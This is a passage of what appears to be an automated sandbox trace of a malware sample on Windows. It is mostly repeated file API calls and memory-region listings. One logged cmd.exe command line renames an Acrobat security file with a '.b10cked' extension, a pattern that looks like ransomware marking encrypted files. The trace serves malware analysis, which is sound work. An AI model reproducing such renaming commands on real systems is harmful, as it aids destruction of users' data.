nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] GetFileType (hFile=0x4c) returned 0x1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] GetFileType (hFile=0x4c) returned 0x1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.289] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] GetFileType (hFile=0x4c) returned 0x1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] GetFileType (hFile=0x4c) returned 0x1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] GetFileType (hFile=0x4c) returned 0x1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] GetFileType (hFile=0x4c) returned 0x1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] GetFileType (hFile=0x4c) returned 0x1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] GetFileType (hFile=0x4c) returned 0x1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] GetFileType (hFile=0x4c) returned 0x1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] GetFileType (hFile=0x4c) returned 0x1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.290] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] GetFileType (hFile=0x4c) returned 0x1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] GetFileType (hFile=0x4c) returned 0x1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] GetFileType (hFile=0x4c) returned 0x1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] GetFileType (hFile=0x4c) returned 0x1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] GetFileType (hFile=0x4c) returned 0x1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] GetFileType (hFile=0x4c) returned 0x1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] GetFileType (hFile=0x4c) returned 0x1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] GetFileType (hFile=0x4c) returned 0x1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.292] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] GetFileType (hFile=0x4c) returned 0x1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] GetFileType (hFile=0x4c) returned 0x1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] GetFileType (hFile=0x4c) returned 0x1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] GetFileType (hFile=0x4c) returned 0x1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] GetFileType (hFile=0x4c) returned 0x1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] GetFileType (hFile=0x4c) returned 0x1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] GetFileType (hFile=0x4c) returned 0x1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] GetFileType (hFile=0x4c) returned 0x1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.293] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] GetFileType (hFile=0x4c) returned 0x1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] GetFileType (hFile=0x4c) returned 0x1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] GetFileType (hFile=0x4c) returned 0x1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] GetFileType (hFile=0x4c) returned 0x1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] GetFileType (hFile=0x4c) returned 0x1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] GetFileType (hFile=0x4c) returned 0x1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] GetFileType (hFile=0x4c) returned 0x1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] GetFileType (hFile=0x4c) returned 0x1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.294] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] GetFileType (hFile=0x4c) returned 0x1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] GetFileType (hFile=0x4c) returned 0x1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] GetFileType (hFile=0x4c) returned 0x1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] GetFileType (hFile=0x4c) returned 0x1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] GetFileType (hFile=0x4c) returned 0x1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] GetFileType (hFile=0x4c) returned 0x1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] GetFileType (hFile=0x4c) returned 0x1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.296] GetFileType (hFile=0x4c) returned 0x1 [0146.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.296] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.296] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x32, lpOverlapped=0x0) returned 1 [0146.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.296] GetFileType (hFile=0x4c) returned 0x1 [0146.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.296] GetFileType (hFile=0x4c) returned 0x1 [0146.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.296] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x32, lpOverlapped=0x0) returned 1 [0146.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.296] _close (_FileHandle=4) returned 0 [0146.296] FindNextFileW (in: hFindFile=0x1a0e50, lpFindFileData=0x16f2c4 | out: lpFindFileData=0x16f2c4) returned 0 [0146.297] GetLastError () returned 0x12 [0146.297] FindClose (in: hFindFile=0x1a0e50 | out: hFindFile=0x1a0e50) returned 1 [0146.297] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0146.298] _close (_FileHandle=3) returned 0 [0146.298] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.298] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.298] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.298] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.298] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.298] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.298] SetConsoleInputExeNameW () returned 0x1 [0146.299] GetConsoleOutputCP () returned 0x1b5 [0146.299] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.299] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.299] exit (_Code=0) Process: id = "206" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ae0" os_pid = "0xb48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR\" \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17695 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17696 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17697 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17698 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 17699 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17700 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17701 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17702 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17703 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 17704 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17821 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17822 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17823 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17824 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 17825 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 17826 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17827 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17828 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17829 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17830 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17831 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17832 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17833 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17834 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17835 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 17836 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" 